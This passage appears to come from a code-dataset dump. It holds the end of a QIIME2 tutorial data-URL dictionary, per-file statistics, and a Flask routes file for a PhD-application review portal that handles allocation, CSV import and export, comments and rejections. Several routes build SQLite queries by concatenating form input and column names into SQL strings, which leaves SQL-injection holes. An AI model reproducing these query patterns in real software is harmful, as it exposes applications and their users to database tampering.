'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.11/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.11/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/feature-table-v100.biom',
'2020.11/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/feature-table-v210.biom',
'2020.11/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz',
'2020.11/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/pe-64-manifest',
'2020.11/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/pe-64.zip',
'2020.11/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/se-33-manifest',
'2020.11/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/se-33.zip',
'2020.11/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/sequences.fna',
'2020.11/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/unrooted-tree.tre',
'2020.11/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz',
'2020.11/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz',
'2020.11/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.11/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/ecam_shannon.qza',
'2020.11/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.11/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.11/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.11/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.11/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/faith_pd_vector.qza',
'2020.11/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/rep-seqs.qza',
'2020.11/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/taxonomy.qza',
'2020.11/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.11/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/otu-clustering/seqs.fna',
'2020.11/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/otu-clustering/85_otus.qza',
'2020.11/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/pd-mice/animal_distal_gut.qza',
'2020.11/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.11/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/pd-mice/manifest',
'2020.11/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.11/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/pd-mice/ref_tax.qza',
'2020.11/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.11/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.11/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/query-seqs.qza',
'2020.11/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/reference-seqs.qza',
'2020.11/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/query-table.qza',
'2020.11/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/read-joining/atacama-seqs.qza',
'2020.11/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/read-joining/fj-joined.zip',
'2020.11/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/sample-classifier/atacama-table.qza',
'2020.11/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.11/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.11/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.11/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.11/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/phylogeny/rep-seqs.qza',
'2020.11/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/utilities/faith-pd-vector.qza',
'2020.11/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/utilities/jaccard-pcoa.qza',
'2020.11/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.11/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/1grGhjYpf8KF56at_T0djGZPl9yYGGEX75tRc4QocZdc/edit?usp=sharing',
'2020.11/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1grGhjYpf8KF56at_T0djGZPl9yYGGEX75tRc4QocZdc/export?gid=0&format=tsv',
## Moving Pictures
'2020.11/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/1hBo_NWijLILEFYJrYs7R_Bwc7i_n3ZmPKUQetpVk-pk/edit?usp=sharing',
'2020.11/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1hBo_NWijLILEFYJrYs7R_Bwc7i_n3ZmPKUQetpVk-pk/export?gid=0&format=tsv',
## Atacama
'2020.11/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1OYoGEnEulIYqCpl73Sl-wO1ipn95l3SL0kjJE3f7QPU/edit?usp=sharing',
'2020.11/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1OYoGEnEulIYqCpl73Sl-wO1ipn95l3SL0kjJE3f7QPU/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.11/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/1Qb3U4wJ89T0jmTG1mPNLu-w-tM1d8mDwOtQZA4ZMjHA/edit?usp=sharing',
'2020.11/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vSwgOEahGwBW3YqOyULE39UsoHM5ma5gHbmPJ25Co8ER2G6nRpsJQclaouBOOBZkdAROBw5ej-WTPhl/pub?gid=1303657428&single=true&output=tsv',
## PD Mice
'2020.11/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1FOKCGDa_bdGu_Vi5gZJancj8nhNevX3U_nX2YS8LirM/edit?usp=sharing',
'2020.11/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vQXcEE5vD_u1dTxeZ9n0JL_BNAF1f4T1S2vpOTdUYnjxji6Gt1L-c5DhOUwcrXchm9_YSyHZo1RZgAh/pub?gid=1509704122&single=true&output=tsv',
}
| 75.735012
| 180
| 0.726802
| 9,537
| 63,163
| 4.784733
| 0.031037
| 0.028138
| 0.056276
| 0.063311
| 0.969298
| 0.96612
| 0.948983
| 0.910195
| 0.865949
| 0.829966
| 0
| 0.109774
| 0.089657
| 63,163
| 833
| 181
| 75.82593
| 0.683826
| 0.021801
| 0
| 0.010695
| 0
| 0.513369
| 0.875034
| 0.283409
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.141711
| 0
| 0.141711
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ed31422c87e7c3aca55017331fc46b457f702f9
| 36,996
|
py
|
Python
|
portal/base/routes.py
|
AnchitSingh/SR_Portal
|
451c448544531a8e593d3a71cf606cf8cc58bbf1
|
[
"MIT"
] | 1
|
2020-06-03T15:37:37.000Z
|
2020-06-03T15:37:37.000Z
|
portal/base/routes.py
|
AnchitSingh/SR_Portal
|
451c448544531a8e593d3a71cf606cf8cc58bbf1
|
[
"MIT"
] | null | null | null |
portal/base/routes.py
|
AnchitSingh/SR_Portal
|
451c448544531a8e593d3a71cf606cf8cc58bbf1
|
[
"MIT"
] | null | null | null |
from flask import Flask,abort, session, render_template, url_for, flash, redirect, request,send_file, Blueprint
from portal import app, db
from portal.models import User, Post
from flask_login import login_user, current_user, logout_user, login_required
import os
import json
from os import path
import pandas as pd
import sqlite3
from datetime import datetime ,date ,timedelta
phds=Blueprint('phds',__name__,template_folder='templates')
#------------------------This code control allocation of files-------------------------------------#
@phds.route("/allocate_phd", methods=['GET', 'POST'])
@login_required
def allocate_phd():
if current_user.is_active==True:
if current_user.is_admin == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
user=User.query.all()
def foo(user,test):
i=0
user_val=0
phd_val=0
flag1=1
# for p in test:
# p[1]="1"
for x in user:
if x.is_admin == False and x.is_manager == False and x.is_active == True:
user_val=user_val+1
for pd in test:
phd_val=phd_val+1
if user_val==0:
flash('No Tutor exists','danger')
else:
quotient = phd_val//user_val
remainder = phd_val%user_val
#flash(phd_val)
for p in test:
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set Tutor1 = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
for u in user:
flag1=1
conn.commit()
i=0
conn.commit()
if u.is_admin==False and u.is_manager==False and u.is_active == True:
# print(u.username)
conn.commit()
for p in test:
# c.execute('''update phd set Tutor1 = "'''+p[1]+'''" WHERE Application = "'''+p[0]+'''";''')
# conn.commit()
if i==quotient:
if remainder > 0 :
flag1=0
if p[1]=="0":
p[1]="1"
conn.commit()
c.execute('''update phd set Tutor1 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "1" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
remainder =remainder - 1
flag1=1
if flag1 == 1:
i=0
break
if i<quotient and p[1]=="0" :
p[1]="1"
conn.commit()
c.execute('''update phd set alloc_status = "1" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set Tutor1 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "1" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
i=i+1
conn.commit()
for p in test:
p[1]="1"
flag1=1
quotient = phd_val//user_val
remainder = phd_val%user_val
fla=0
i=0
for u in user:
flag1=1
if u.is_admin==False and u.is_manager==False and u.is_active == True :
if fla==1:
for p in test:
if i==quotient:
if remainder > 0 :
flag1=0
if p[1]=="1" and p[3] != u.username:
p[1]="0"
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
remainder =remainder - 1
flag1=1
if flag1 == 1:
i=0
break
if i<quotient and p[1]=="1" and p[3]!=u.username:
p[1]="0"
conn.commit()
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
i=i+1
fla=1
flag1=1
fla=0
quotient = phd_val//user_val
i=0
for u in user:
flag1=1
if u.is_admin==False and u.is_manager==False and u.is_active == True:
for p in test:
if i==quotient:
if remainder > 0 :
flag1=0
if p[1] =="1" and p[3] != u.username:
p[1]="0"
conn.commit()
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
remainder =remainder - 1
flag1=1
if flag1 == 1:
i=0
break
if i<quotient and p[1]=="1" and p[3]!=u.username:
p[1]="0"
conn.commit()
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
i=i+1
break
for pd in test:
pd[1]="1"
flash("Phd files allocated successfully","success")
foo(user,test)
return redirect(url_for('phds.phd'))
else:
report=str(current_user.username)+' tried to accessed unauthorized route -> allocate_phd '
fillReport(report,current_user.username,datetime.now())
return render_template('error.html',error=404)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
#-------------------------Allocation code ends here---------------------------------#
#-------------------------Database Creation Code------------------------------------#
@phds.route("/phdcsv", methods=['GET', 'POST'])
@login_required
def phdcsv():
if current_user.is_active ==True:
if current_user.is_admin == True:
if path.exists("portal/static/original-csv/phd.csv"):
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
df=pd.read_csv('portal/static/original-csv/phd.csv')
new_columns=set(df.columns)
if 'Application Ref. No.' in new_columns:
new_columns.remove('Application Ref. No.')
c.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='phd' ''')
if c.fetchone()[0]==1 :
c.execute('''DROP TABLE phd;''')
c.execute('''
CREATE TABLE phd (
"Application Ref. No." TEXT PRIMARY KEY UNIQUE
);''')
s=list(new_columns)
for i in range(len(s)):
c.execute('''ALTER TABLE phd ADD'''+''' "'''+s[i]+'''" '''+'''TEXT''')
df.to_sql(name='phd', con=db.engine, if_exists = 'append', index=False)
c.execute('''ALTER TABLE phd ADD tt2 DATE DEFAULT "None"''') #15
c.execute('''ALTER TABLE phd ADD tt1 DATE DEFAULT "None"''') #14
c.execute('''ALTER TABLE phd ADD ft2 DATE DEFAULT "None"''') #13
c.execute('''ALTER TABLE phd ADD st2 DATE DEFAULT "None"''') #12
c.execute('''ALTER TABLE phd ADD ft1 DATE DEFAULT "None"''') #11
c.execute('''ALTER TABLE phd ADD st1 DATE DEFAULT "None"''') #10
c.execute('''ALTER TABLE phd ADD Comment2 TEXT''')
c.execute('''ALTER TABLE phd ADD Submission2 TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Reject_Reason TEXT''')
c.execute('''ALTER TABLE phd ADD Validation TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Comment1 TEXT''')
c.execute('''ALTER TABLE phd ADD Submission1 TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Tutor1 TEXT DEFAULT "Not Assigned" ''')
c.execute('''ALTER TABLE phd ADD Tutor2 TEXT DEFAULT "Not Assigned" ''')
c.execute('''ALTER TABLE phd ADD alloc_status TEXT DEFAULT "0" ''')
c.execute('''ALTER TABLE phd ADD Application TEXT''')
c.execute('''update phd set Application = "Application Ref. No."; ''')
# test=c.execute('''SELECT * from phd''').fetchall()
conn.commit()
conn.close()
flash('Database successfully created', 'success')
else:
flash('phd.csv doesnot contain "Application Ref. No." column','danger')
else:
flash('First upload Csv file with name phd.csv','danger')
return redirect(url_for('upload'))
else:
return render_template('error.html',error=404)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
#------------------------------------Reset Database --------------------------------------------#
@phds.route("/reset_phd", methods=['GET', 'POST'])
@login_required
def reset_phd():
if current_user.is_active == True:
if current_user.is_admin == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
c.execute('''DELETE FROM phd;''')
c.execute('''DELETE FROM violations;''')
conn.commit()
conn.close()
return redirect(url_for('phds.phd'))
else:
report=str(current_user.username)+' tried to accessed unauthorized route -> Phd Reset '
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
return render_template('error.html',error=403)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route("/downloadphdCsv")
@login_required
def downloadphdCsv():
if current_user.is_active == True:
if current_user.is_admin == True or current_user.is_manager==True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
db_df=pd.read_sql_query("SELECT * FROM phd", conn)
if 'alloc_status' in db_df.columns:
db_df=db_df.drop('alloc_status',1)
if 'Submission1' in db_df.columns:
db_df=db_df.drop('Submission1',1)
if 'Submission2' in db_df.columns:
db_df=db_df.drop('Submission2',1)
if 'Comment2' in db_df.columns:
db_df=db_df.drop('Comment2',1)
if 'st1' in db_df.columns:
db_df=db_df.drop('st1',1)
if 'ft1' in db_df.columns:
db_df=db_df.drop('ft1',1)
if 'st2' in db_df.columns:
db_df=db_df.drop('st2',1)
if 'ft2' in db_df.columns:
db_df=db_df.drop('ft2',1)
if 'tt1' in db_df.columns:
db_df=db_df.drop('tt1',1)
if 'tt2' in db_df.columns:
db_df=db_df.drop('tt2',1)
if 'Reject_Reason' in db_df.columns:
db_df=db_df.drop('Reject_Reason',1)
if 'Validation' in db_df.columns:
db_df=db_df.drop('Validation',1)
if 'Application' in db_df.columns:
db_df=db_df.drop('Application',1)
if 'Comment1' in db_df.columns:
db_df=db_df.drop('Comment1',1)
if 'Tutor1' in db_df.columns:
db_df=db_df.drop('Tutor1',1)
if 'Tutor2' in db_df.columns:
db_df=db_df.drop('Tutor2',1)
db_df.to_csv('portal/static/Updated-CSV/Updated-phd.csv', index=False)
p="static/Updated-CSV/Updated-phd.csv"
conn.close()
return send_file(p,as_attachment=True)
else:
return render_template('error.html',error=403)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route("/phd")
@login_required
def phd():
if current_user.is_active == True:
user=User.query.all()
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
t=c.execute('''PRAGMA table_info('phd')''').fetchall()
if (len(test)):
length=len(test[0])
else:
length=0
test=[tup[::-1] for tup in test]
t.reverse()
image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
conn.close()
if current_user.is_admin==True or current_user.is_manager == True:
return render_template('phd_admin.html', title='Phd',user=user,image_file=image_file,phd=test,t=t,length=length)
else:
return render_template('phd_ta.html', title='Phd',user=user,image_file=image_file,phd=test,t=t,length=length)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/lab_phd/<application>')
@login_required
def lab_phd(application):
if current_user.is_active == True:
image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
t=c.execute('''PRAGMA table_info('phd')''').fetchall()
if (len(test)):
length=len(test[0])
else:
length=0
test=[tup[::-1] for tup in test]
t.reverse()
for p in test:
if p[0]==application:
if p[4] != 'Done':
flash('This file has not yet been submitted by TA', 'danger')
return render_template('lab_phd.html',image_file=image_file,title='Lab',cand=p,t=t,length=length)
else:
return render_template('lab_phd.html',image_file=image_file,title='Lab',cand=p,t=t,length=length)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/ta_lab_phd/<application>')
@login_required
def ta_lab_phd(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
t=c.execute('''PRAGMA table_info('phd')''').fetchall()
if (len(test)):
length=len(test[0])
else:
length=0
test=[tup[::-1] for tup in test]
t.reverse()
image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
for p in test:
if p[0]==application:
if current_user.username==p[3]:
if p[10] == 'None':
c.execute("update phd set st1 = ? WHERE Application = ?",(datetime.now(),application))
conn.commit()
else:
if p[12] == 'None':
c.execute("update phd set st2 = ? WHERE Application = ?",(datetime.now(),application))
conn.commit()
return render_template('ta_lab_phd.html',image_file=image_file,title='Lab',cand=p,t=t,length=length)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/send_phd1/<application>')
@login_required
def send_phd1(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
flag=0
for p in test:
if p[0]==application:
if p[3] == current_user.username:
c.execute("update phd set ft1 = ? WHERE Application = ?",(datetime.now(),application))
conn.commit()
filltime1(application)
c.execute('''update phd set Submission1 = "Done" WHERE Application = "'''+application+'''";''')
conn.commit()
c.execute('''update phd set Validation = "Pending" WHERE Application = "'''+application+'''";''')
conn.commit()
c.execute('''update phd set Reject_Reason = "None" WHERE Application = "'''+application+'''";''')
conn.commit()
flag=1
flash('File submitted successfully ','success')
break
else:
report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
fillReport(report,current_user.username,datetime.now())
flag=1
flash('This incident will be reported ','danger')
break
if flag==0:
flash('No such file exist','danger')
too(test)
return redirect(url_for('phds.phd'))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/send_phd2/<application>')
@login_required
def send_phd2(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
flag=0
for p in test:
if p[0]==application:
if p[2] == current_user.username:
c.execute("update phd set ft2 = ? WHERE Application = ?",(datetime.now(),application))
conn.commit()
filltime2(application)
c.execute('''update phd set Submission2 = "Done" WHERE Application = "'''+application+'''";''')
conn.commit()
c.execute('''update phd set Validation = "Pending" WHERE Application = "'''+application+'''";''')
conn.commit()
c.execute('''update phd set Reject_Reason = "None" WHERE Application = "'''+application+'''";''')
conn.commit()
flag=1
flash('File submitted successfully ','success')
break
else:
report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
fillReport(report,current_user.username,datetime.now())
flag=1
flash('This incident will be reported ','danger')
break
too(test)
return redirect(url_for('phds.phd'))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/verify_phd/<application>')
@login_required
def verify_phd(application):
if current_user.is_active == True:
if current_user.is_admin==True or current_user.is_manager == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
for p in test:
if p[0] == application:
c.execute('''update phd set Validation = "Done" WHERE Application = "'''+application+'''";''')
conn.commit()
if p[4] == 'Done':
flash('File verified successfully','success')
else:
flash("You have a verified non submitted file",'info')
break
too(test)
return redirect(url_for('dashboard'))
else:
report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported','danger')
return render_template('error.html',error=403)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/comment_phd1/<application>', methods=['GET', 'POST'])
@login_required
def comment_phd1(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
for p in test:
if p[0]==application:
if p[3] == current_user.username or p[2] == current_user.username:
c.execute('''update phd set Comment1 = "'''+request.form['comment']+'''" WHERE Application = "'''+application+'''";''')
conn.commit()
flash('Comment added successfully', 'info')
break
else:
report=str(current_user.username)+' tried to add comment an unassigned file = '+str(application)
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
break
too(test)
return redirect(url_for('phds.ta_lab_phd',application=application))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/comment_phd2/<application>', methods=['GET', 'POST'])
@login_required
def comment_phd2(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
for p in test:
if p[0]==application:
if p[3] == current_user.username or p[2] == current_user.username:
c.execute('''update phd set Comment2 = "'''+request.form['comment']+'''" WHERE Application = "'''+application+'''";''')
conn.commit()
flash('Comment added successfully', 'info')
break
else:
report=str(current_user.username)+' tried to add comment an unassigned file = '+str(application)
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
break
too(test)
return redirect(url_for('phds.ta_lab_phd',application=application))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
def fillLogs(usr,pos,app_no,col,old_val,new_val,dt):
conn = sqlite3.connect('portal/site.db')
course='phd'
c = conn.cursor()
c.execute("INSERT INTO system_logs (User,pos,Application_number,column_name,course,old_val,new_val,Date) VALUES (?,?,?,?,?,?,?,?) ",(usr,pos,app_no,col,course,old_val,new_val,dt))
conn.commit()
conn.close()
return
@phds.route('/edit_phd/<application>', methods=['GET', 'POST'])
@login_required
def edit_phd(application):
if current_user.is_active == True:
if current_user.is_manager==True or current_user.is_admin==True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
t=c.execute('''PRAGMA table_info('phd')''').fetchall()
t.reverse()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
var=request.form['column_val']
new_val = request.form[var]
db_df=pd.read_sql_query('SELECT "'+var+'" FROM phd WHERE application = "'+application+'"', conn)
old_val=db_df[var][0]
c.execute('''update phd set "'''+var+'''" = ? WHERE Application = ?''',(request.form[var],application))
conn.commit()
if current_user.is_admin==True:
pos='Admin'
else:
pos='Manager'
fillLogs(current_user.username,pos,application,var,old_val,new_val,datetime.now())
flash('Updated '+var,'success')
too(test)
return redirect(url_for('phds.lab_phd',application=application))
else:
report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
else:
return redirect(url_for('logout'))
@phds.route('/reject_phd/<application>', methods=['GET', 'POST'])
@login_required
def reject_phd(application):
if current_user.is_active == True:
if current_user.is_admin == True or current_user.is_manager==True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
for p in test:
if p[0]==application:
c.execute('''update phd set Reject_Reason = "'''+request.form['msg']+'''" WHERE Application = "'''+application+'''";''')
conn.commit()
c.execute('''update phd set Submission1 = "Pending" WHERE Application = "'''+application+'''";''')
conn.commit()
